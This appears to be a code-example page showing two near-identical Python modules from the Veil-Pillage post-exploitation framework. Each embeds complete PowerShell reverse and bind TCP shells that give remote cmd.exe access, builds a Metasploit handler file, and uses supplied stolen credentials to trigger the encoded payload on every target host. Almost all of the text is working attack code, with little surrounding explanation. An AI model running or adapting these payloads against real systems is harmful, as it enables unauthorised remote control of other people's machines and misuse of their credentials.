        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
コード例 #31
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        shell = self.required_options["shell"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # start building the handler in case we want to invoke it
        handler = "use exploit/multi/handler"

        # the pure powershell windows_reverse_tcp shell
        revTCPShell = """function cleanup {
if ($c.Connected -eq $true) {$c.Close()}
if ($p.ExitCode -ne $null) {$p.Close()}
exit}
$c = New-Object system.net.sockets.tcpclient
$c.connect('%s','%s')
$stream = $c.GetStream()
$n = New-Object System.Byte[] $c.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process
$p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$o = $p.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false;
while (-not $done) {
if ($c.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $n.Length)) {
$read = $stream.Read($n,$pos,$n.Length - $pos)
$pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($n,0,$pos)
$is.write($string)
start-sleep 1
if ($p.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($o.Read())
while($o.Peek() -ne -1){
$out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}""" % (lhost, lport)

        bindTCPShell = """$en = new-object System.Text.AsciiEncoding
$ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s")
$l = new-object System.Net.Sockets.TcpListener $ep
$l.start()
$socket = $l.AcceptTcpClient()
$ns = $socket.GetStream()
$nb = New-Object System.Byte[] $socket.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process 
$p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$os = $p.StandardOutput
Start-Sleep 1
while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())}
$ns.Write($en.GetBytes($string),0,$string.Length)
$string = '' 
$done = $false
while (-not $done) {
    $pos = 0
    $i = 1
    while (($i -gt 0) -and ($pos -lt $nb.Length)) {
                    $read = $ns.Read($nb,$pos,$nb.Length - $pos)
        $pos+=$read
        if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}}
    if ($pos -gt 0) {
        $string = $en.GetString($nb,0,$pos)
        $is.write($string)
        $out = $en.GetString($os.Read())
        while($os.Peek() -ne -1){$out += $en.GetString($os.Read())}
        $ns.Write($en.GetBytes($out),0,$out.length)
        $out = $null} else {$done = $true}}
        """ % (lport)

        # if the user specific a reverse_tcp shell
        if shell.lower() == "rev_tcp":
            # make sure we have lhost filled in
            if lhost == "none":
                print helpers.color(" [!] 'lhost' required for rev_tcp! ",
                                    warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

            # get the encoded powershell trigger command
            triggerCMD = helpers.encPowershell(revTCPShell)
            handler += "\nset PAYLOAD windows/shell_reverse_tcp"
            handler += "\nset LHOST " + lhost
            handler += "\nset LPORT " + lport
            handler += "\nset ExitOnSession false"
            handler += "\nexploit -j\n"
            f = open('/tmp/handler.rc', 'w')
            f.write(handler)
            f.close()

            # build and spawn a handler for the reverse shell
            if spawnHandler.lower() == "true":
                handlerPath = "/tmp/handler.rc"
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # bind_tco shell is easier :)
        elif shell.lower() == "bind_tcp":
            triggerCMD = helpers.encPowershell(bindTCPShell)
        else:
            print helpers.color(
                "\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n",
                warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # execute the powershell trigger command on each target
        for target in self.targets:
            # trigger the command and set output as appropriate
            print "\n [*] Triggering powershell shell '" + shell.lower(
            ) + "' with lhost=" + lhost + " and lport=" + lport + " on " + target
            self.output += "[*] Triggering powershell shell '" + shell.lower(
            ) + "' with lhost=" + lhost + " and lport=" + lport + " using creds '" + username + ":" + password + "' on " + target + "\n"
            command_methods.executeCommand(target, username, password,
                                           triggerCMD, triggerMethod)

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
コード例 #32
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        shell = self.required_options["shell"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # start building the handler in case we want to invoke it
        handler = "use exploit/multi/handler"

        # the pure powershell windows_reverse_tcp shell
        revTCPShell = """function cleanup {
if ($c.Connected -eq $true) {$c.Close()}
if ($p.ExitCode -ne $null) {$p.Close()}
exit}
$c = New-Object system.net.sockets.tcpclient
$c.connect('%s','%s')
$stream = $c.GetStream()
$n = New-Object System.Byte[] $c.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process
$p.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$o = $p.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($o.Peek() -ne -1){$out += $encoding.GetString($o.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false;
while (-not $done) {
if ($c.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $n.Length)) {
$read = $stream.Read($n,$pos,$n.Length - $pos)
$pos+=$read; if ($pos -and ($n[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($n,0,$pos)
$is.write($string)
start-sleep 1
if ($p.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($o.Read())
while($o.Peek() -ne -1){
$out += $encoding.GetString($o.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}""" %(lhost, lport)

        bindTCPShell = """$en = new-object System.Text.AsciiEncoding
$ep = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "%s")
$l = new-object System.Net.Sockets.TcpListener $ep
$l.start()
$socket = $l.AcceptTcpClient()
$ns = $socket.GetStream()
$nb = New-Object System.Byte[] $socket.ReceiveBufferSize
$p = New-Object System.Diagnostics.Process 
$p.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$p.StartInfo.RedirectStandardInput = 1
$p.StartInfo.RedirectStandardOutput = 1
$p.StartInfo.UseShellExecute = 0
$p.Start()
$is = $p.StandardInput
$os = $p.StandardOutput
Start-Sleep 1
while($os.Peek() -ne -1){ $string += $en.GetString($os.Read())}
$ns.Write($en.GetBytes($string),0,$string.Length)
$string = '' 
$done = $false
while (-not $done) {
    $pos = 0
    $i = 1
    while (($i -gt 0) -and ($pos -lt $nb.Length)) {
                    $read = $ns.Read($nb,$pos,$nb.Length - $pos)
        $pos+=$read
        if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}}
    if ($pos -gt 0) {
        $string = $en.GetString($nb,0,$pos)
        $is.write($string)
        $out = $en.GetString($os.Read())
        while($os.Peek() -ne -1){$out += $en.GetString($os.Read())}
        $ns.Write($en.GetBytes($out),0,$out.length)
        $out = $null} else {$done = $true}}
        """ %(lport)

        # if the user specific a reverse_tcp shell
        if shell.lower() == "rev_tcp":
            # make sure we have lhost filled in
            if lhost == "none":
                print helpers.color(" [!] 'lhost' required for rev_tcp! ", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

            # get the encoded powershell trigger command
            triggerCMD = helpers.encPowershell(revTCPShell)
            handler += "\nset PAYLOAD windows/shell_reverse_tcp"
            handler += "\nset LHOST " + lhost
            handler += "\nset LPORT " + lport
            handler += "\nset ExitOnSession false"
            handler += "\nexploit -j\n"
            f = open('/tmp/handler.rc', 'w')
            f.write(handler)
            f.close()

            # build and spawn a handler for the reverse shell
            if spawnHandler.lower() == "true":
                handlerPath = "/tmp/handler.rc"
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # bind_tco shell is easier :)
        elif shell.lower() == "bind_tcp":
            triggerCMD = helpers.encPowershell(bindTCPShell)
        else:
            print helpers.color("\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # execute the powershell trigger command on each target
        for target in self.targets:
            # trigger the command and set output as appropriate
            print "\n [*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" on "+target
            self.output += "[*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" using creds '"+username+":"+password+"' on "+target+"\n"
            command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)

             # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"